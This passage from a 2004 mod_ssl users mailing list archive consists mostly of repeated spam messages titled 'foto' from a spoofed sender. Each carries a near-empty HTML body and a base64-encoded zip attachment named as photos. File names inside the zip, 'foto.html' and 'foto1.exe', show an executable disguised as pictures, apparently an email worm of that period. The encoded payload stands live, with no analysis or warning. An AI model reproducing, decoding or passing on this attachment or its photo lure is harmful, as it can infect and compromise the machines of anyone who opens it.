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
AA==

----------jkygnmuitjtfsrglstpt--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 31 22:21:26 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E5188A8978; Tue, 31 Aug 2004 22:21:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ibm-tutawko3x6t.net (bi01p1.nc.us.ibm.com [129.33.49.251])
	by master.modssl.org (Postfix) with SMTP id 19B55A8943
	for ; Tue, 31 Aug 2004 22:21:21 +0200 (CEST)
Date: Tue, 31 Aug 2004 16:22:13 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------fdvwcjvbubupwurccbce"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------fdvwcjvbubupwurccbce
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------fdvwcjvbubupwurccbce
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

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
AA==

----------fdvwcjvbubupwurccbce--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 31 22:24:29 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 20914A8995; Tue, 31 Aug 2004 22:24:29 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from GX260.org (h-66-166-161-242.atlngahp.covad.net [66.166.161.242])
	by master.modssl.org (Postfix) with SMTP id 2B476A8943
	for ; Tue, 31 Aug 2004 22:24:23 +0200 (CEST)
Date: Tue, 31 Aug 2004 16:23:17 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------mhosrhxtcevlpfhazpiz"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------mhosrhxtcevlpfhazpiz
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------mhosrhxtcevlpfhazpiz
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

UEsDBAoAAAAAAKGEITEAAAAAAAAAAAAAAAAFAAAAZm90by9QSwMEFAAAAAgAAI8hMR9CJh4i
AgAAYwQAAA4AAABmb3RvL2ZvdG8uaHRtbI1UUY+aQBB+v+T+wx4Ph+YKHNr0TA9MLFJj43HN
qfWxWWFYtsGFLKOeafzvXZBei5KmG0LYmfm+b2aYXScBGg2vr5wilDxHklLBtpSBq32hOzqv
jJry76gk8Ao5xcTV4wwzq3zZprLpjwpunfAqUm3m3sv064LMRsFkOZr451zOjWGcGNeCbsAV
dMcZxUyaNM8DZVGEsAeMERlxiYaSxQcWRTFjmnIlMTuwpPLAXgJKPFRP6atIdyDdnMoCpgI7
DfJvIAueie5jmWa8FSGqHeGiQJqmnS75eX1F6sVj0iF/wHlKMc7khtzetllvXKKvuOj3dNJg
+b3SLKSllilBYULo6MHzYjUN+r3V6CWYBhMzwU2ql4mdQ1WFWyn+chybSVY9JK5K4ImHMiuy
GIkqHKQAJP5rnmYSpF7mXTaGDF3Sa00xysLtBgSae8lRJehk6x8QIuGRqzG+1sieR+rn2yQB
zhJUH2FKi6J0e7P5dPzx3h58evC9vuH73siw7ahvDPwH27hXyx/0vA/e/VhTQmEWwZoWasT0
u3qk7nRt6FgnwWGjC0cCaQFnhQaARUhzaFT1vrUqlJwxFeASUYPMskPbPKII5uLkbel6KVhj
zWUV7Au6TiFqVTlTM+dIJc6Vzp5KOME7danv3oLG/ufRcrb4/vQ89ruXnHXl/1C7GKpaom2K
jhct/Z8pbSFURMfy9LwdmuosWRYxjGHjHnCs+mr5BVBLAwQKAAAAAAChhCExAAAAAAAAAAAA
AAAACgAAAGZvdG8vZm90by9QSwMEFAAAAAgAL48hMUNfuiVDEAAAADIAABMAAABmb3RvL2Zv
